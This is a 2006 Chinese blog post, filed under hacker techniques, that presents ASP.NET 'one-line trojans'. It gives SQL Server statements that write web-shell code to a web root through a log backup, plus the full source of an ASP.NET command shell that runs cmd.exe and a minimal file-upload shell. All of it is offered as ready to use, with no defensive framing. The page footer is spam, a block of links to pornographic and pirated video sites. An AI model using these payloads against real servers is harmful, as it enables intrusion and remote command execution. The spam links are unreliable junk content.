酒水不犯茶水
葉的離去,是風的追求還是樹的不挽留?
BlogJava
|
首頁
|
發新隨筆
|
發新文章
|
聯系
|
聚合
|
管理
隨筆:325 文章:0 評論:612 引用:0
aspx的一句話木馬
from:Security Box
1.相當于ASP的一句話木馬:
1
alter
?
database
?pubs?
set
?RECOVERY?
FULL
--
2
create
?
table
?pubs.dbo.cmd(a?
image
)
3
backup
?
log
?pubs?
to
?
disk
?
=
?
'
c:\TM
'
?
with
?init
4
insert
?
into
?pubs.dbo.cmd(a)?
values
?(
'
<%@?Page?Language="C#"?validateRequest="false"?%><%System.IO.StreamWriter?ow=new?System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>?
'
)
5
backup
?
log
?pubs?
to
?
disk
?
=
?
'
d:\test11.aspx
'
mu.aspx.htm 客戶端:(提交后訪問:http://IP/images.aspx)
?1
<
form?
action
=http://192.168.2.100/asp/mu.aspx?
method
=post
>
?
?2
<
b
>
在下面輸入大馬內容:
</
b
><
br
>
?3
<
textarea?
name
=l?
cols
=120?
rows
=35?
width
=45
>
?
?4
<%
@?Page?Language
=
"
VB
"
?Debug
=
"
true
"
?
%>
?5
<%
@?import?Namespace
=
"
system.IO
"
?
%>
?6
<%
@?import?Namespace
=
"
System.Diagnostics
"
?
%>
?7
<
script?
runat
="server"
>
?
?8
????Sub?RunCmd(Src?As?Object,?E?As?EventArgs)?
?9
????????Dim?myProcess?As?New?Process()?
10
????????Dim?myProcessStartInfo?As?New?ProcessStartInfo(xpath.Text)?
11
????????myProcessStartInfo.UseShellExecute?
=
?False?
12
????????myProcessStartInfo.RedirectStandardOutput?
=
?
true
?
13
????????myProcess.StartInfo?
=
?myProcessStartInfo?
14
????????myProcessStartInfo.Arguments
=
xCmd.text
15
????????myProcess.Start()
16
????????Dim?myStreamReader?As?StreamReader?
=
?myProcess.StandardOutput?
17
????????Dim?myString?As?String?
=
?myStreamReader.Readtoend()
18
????????myProcess.Close()
19
????????mystring
=
replace(mystring,
"
<
"
,
"
<
"
)
20
????????mystring
=
replace(mystring,
"
>
"
,
"
>
"
)
21
????????result.text
=
?vbcrlf?
&
?
"
<pre>
"
?
&
?mystring?
&
?
"
</pre>
"
22
????End?Sub?
23
</
script
>
24
<
html
><
head
>
25
<
title
>
ASP.NET?Shell?for?WebAdmin2.X?Final
</
title
>
26
<
meta?
http-equiv
="Content-Type"
?c?
/></
head
><
body
>
27
<
form?
runat
="server"
>
28
<
asp:Label?
id
="L_p"
?style
="COLOR:?#0000ff"
?runat
="server"
?width
="80px"
>
;Program
</
asp:Label
>
29
<
asp:TextBox?
id
="xpath"
?style
="BORDER-RIGHT:?#084b8e?1px?solid;?BORDER-TOP:?#084b8e?1px?solid;?BORDER-LEFT:?#084b8e?1px?solid;?BORDER-BOTTOM:?#084b8e?1px?solid"
?runat
="server"
?Width
="300px"
>
c:\windows\system32\cmd.exe
</
asp:TextBox
><
br?
/>
30
<
asp:Label?
id
="L_a"
?style
="COLOR:?#0000ff"
?runat
="server"
?width
="80px"
>
Arguments
</
asp:Label
>
31
<
asp:TextBox?
id
="xcmd"
?style
="BORDER-RIGHT:?#084b8e?1px?solid;?BORDER-TOP:?#084b8e?1px?solid;?BORDER-LEFT:?#084b8e?1px?solid;?BORDER-BOTTOM:?#084b8e?1px?solid"
?runat
="server"
?Width
="300px"
?Text
="/c?net?user"
>
/c?net?user
</
asp:TextBox
><
br?
/>
32
<
asp:Button?
id
="Button"
?style
="BORDER-RIGHT:?#084b8e?1px?solid;?BORDER-TOP:?#084b8e?1px?solid;?BORDER-LEFT:?#084b8e?1px?solid;?COLOR:?#ffffff;?BORDER-BOTTOM:?#084b8e?1px?solid;?BACKGROUND-COLOR:?#719bc5"
?runat
="server"
?Width
="100px"
?Text
="Run"
></
asp:Button
><
p
>
33
<
asp:Label?
id
="result"
?style
="COLOR:?#0000ff"
?runat
="server"
></
asp:Label
>
?
</
p
></
form
></
body
></
html
>
34
</
textarea
><
BR
><
center
><
br
>
?
35
<
input?
type
=submit?
value
=提交
>
2、下面這個是我找網上的asp.net的上傳文件程序,修改精簡了下,也可以用:
1
drop
?
table
?pubs.dbo.cmd
2
alter
?
database
?pubs?
set
?RECOVERY?
FULL
3
create
?
table
?pubs.dbo.cmd(a?
image
)
4
backup
?
log
?pubs?
to
?
disk
?
=
?
'
c:\TM
'
?
with
?init
5
insert
?
into
?pubs.dbo.cmd(a)?
values
?(
'
<script?language="c#"?runat="server">private?void?bc(object?o,EventArgs?e)?{string?u="files";string?filename;int?pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos?+?1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form?method="post"?runat="server"><input?type="file"?id="f"?runat="server"/><input?type="submit"?value="ss"?runat="Server"?/></form>
'
)
6
backup
?
log
?pubs?
to
?
disk
?
=
?
'
c:\inetpub\wwwroot\test11.aspx
'
發表于 2006-11-28 00:25
009
閱讀(6184)
評論(0)
編輯
收藏
所屬分類:
黑客技術
新用戶注冊
刷新評論列表
只有注冊用戶
登錄
后才能發表評論。
網站導航:
博客園
IT新聞
Chat2DB
C++博客
博問
管理
相關文章:
小米手環分析
Sniffing Proprietary 2.4GHz Signals
打算做個HackRF
使用xgoldmon項目調試監控本機通信
OsmocomBB項目
Raspberry Pi 增加TFT顯示
TVB-Gone 紅外編碼方法(每次都重新推算一遍,年紀大了還是記錄一下吧)
Raspberry Pi 入手安裝配置 (有圖有真相)
無線鍵盤監聽(更新 LCD 1602)
遭受 MSN D.o.S
<
2006年11月
>
日
一
二
三
四
五
六
29
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
9
公告
常用鏈接
我的隨筆
我的評論
我的參與
最新評論
留言簿
(113)
給我留言
查看公開留言
查看私人留言
隨筆分類
2D & 3D(14)
(rss)
ajax(3)
(rss)
OTHERS(82)
(rss)
UNIX(27)
(rss)
兄弟(2)
(rss)
系統編程(85)
(rss)
經驗技巧(51)
(rss)
網絡資源(8)
(rss)
網頁編程(20)
(rss)
黑客技術(88)
(rss)
隨筆檔案
2021年11月 (1)
2019年7月 (1)
2018年11月 (1)
2016年2月 (1)
2015年9月 (1)
2015年5月 (1)
2015年4月 (2)
2014年10月 (1)
2014年6月 (1)
2014年5月 (1)
2014年3月 (3)
2013年11月 (2)
2013年9月 (1)
2013年6月 (1)
2013年5月 (1)
2013年4月 (1)
2012年12月 (1)
2012年11月 (1)
2012年10月 (1)
2012年8月 (1)
2012年7月 (1)
2012年5月 (2)
2012年4月 (1)
2012年3月 (1)
2011年12月 (3)
2011年11月 (2)
2011年10月 (2)
2011年7月 (2)
2011年2月 (1)
2010年11月 (2)
2010年6月 (2)
2010年5月 (1)
2010年3月 (1)
2010年2月 (1)
2010年1月 (1)
2009年11月 (1)
2009年10月 (2)
2009年9月 (2)
2009年7月 (1)
2009年4月 (1)
2009年2月 (1)
2009年1月 (1)
2008年12月 (1)
2008年10月 (5)
2008年9月 (9)
2008年8月 (6)
2008年7月 (5)
2008年6月 (2)
2008年5月 (8)
2008年4月 (4)
2008年3月 (6)
2008年2月 (5)
2008年1月 (4)
2007年12月 (22)
2007年11月 (15)
2007年10月 (3)
2007年9月 (11)
2007年8月 (40)
2007年7月 (16)
2007年6月 (5)
2007年5月 (16)
2007年4月 (15)
2007年3月 (15)
2007年2月 (4)
2007年1月 (3)
2006年12月 (22)
2006年11月 (14)
文章分類
系統編程
(rss)
網絡資源
(rss)
網頁編程
(rss)
黑客技術
(rss)
相冊
080512汶川大地震
20130405
mypic
taobao
ubuntu
W810C
手工
畫畫兒
草莓音樂節
Link
動力老男孩
(rss)
愛上DIY
搜索
最新評論
1.?re: OsmocomBB項目
@zhou-xuelin
哇~~~多謝多謝?。?!
--009
2.?re: OsmocomBB項目
評論內容較長,點擊標題查看
--zhou-xuelin
3.?re: OsmocomBB項目
我的顯示未發現libncurse 軟件包是什么原因呢
--HYH
4.?re: 樓上 惡鄰 小孩 奔跑 咚咚咚
樓下一群跳廣場舞的怎么辦?還天天循環播放那幾首低俗歌
--斗魚
5.?re: 小米手環分析[未登錄]
沒看到鬧鐘的內容,根據鬧鐘和震動提醒功能,可以做一些應用。
--kim
閱讀排行榜
1.?OsmocomBB項目(52245)
2.?Unicode編碼表/0000-0FFF(19458)
3.?水果機密碼解碼 "密碼公式" 看了就知道怎么打暴機了(ZT)(17701)
4.?打算做個HackRF(17290)
5.?Raspberry Pi 入手安裝配置 (有圖有真相)(15000)
評論排行榜
1.?OsmocomBB項目(118)
2.?打算做個HackRF(18)
3.?無線鍵盤監聽(更新 LCD 1602)(15)
4.?Token Kidnapping Windows 2003 PoC exploit (Win2K3測試成功)(13)
5.?我是007加密后的軟件密碼破解(13)
Powered by:
博客園
模板提供:
滬江博客
Copyright ©2025 009
2006 ©
009網站
版權沒有,任意拷貝
如有意見和建議,請 E-mail 至
baicker@hotmail.com
建議使用
Firefox & 微軟雅黑字體
進行瀏覽,最佳顯示
1400*1050
主站蜘蛛池模板:
产传媒61国产免费
|
中文字幕久精品免费视频
|
人人狠狠综合久久亚洲高清
|
国产精品福利在线观看免费不卡
|
亚洲人成图片小说网站
|
日本黄色动图免费在线观看
|
亚洲导航深夜福利
|
国产乱弄免费视频
|
亚洲精品线在线观看
|
香蕉视频免费在线
|
亚洲卡一卡2卡三卡4卡无卡三
|
91成人免费观看网站
|
免费播放国产性色生活片
|
久久精品国产亚洲AV麻豆网站
|
免费精品一区二区三区在线观看
|
午夜免费啪视频在线观看
|
亚洲精品无码av片
|
精品亚洲一区二区
|
免费观看美女裸体网站
|
久久久精品免费视频
|
国产成人亚洲毛片
|
亚洲国产精品一区二区久
|
a级毛片高清免费视频就
|
免费大香伊蕉在人线国产
|
人妻丰满熟妇无码区免费
|
美女18一级毛片免费看
|
亚洲人成在久久综合网站
|
久久久久亚洲AV成人网人人软件
|
国产成在线观看免费视频
|
女同免费毛片在线播放
|
美女被免费网站在线视频免费
|
亚洲视屏在线观看
|
亚洲精品成人片在线播放
|
亚美影视免费在线观看
|
高清国语自产拍免费视频国产
|
一本色道久久综合亚洲精品蜜桃冫
|
亚洲中文字幕无码日韩
|
国产中文字幕免费
|
成年午夜视频免费观看视频
|
四虎影视在线影院在线观看免费视频
|
一本岛v免费不卡一二三区
|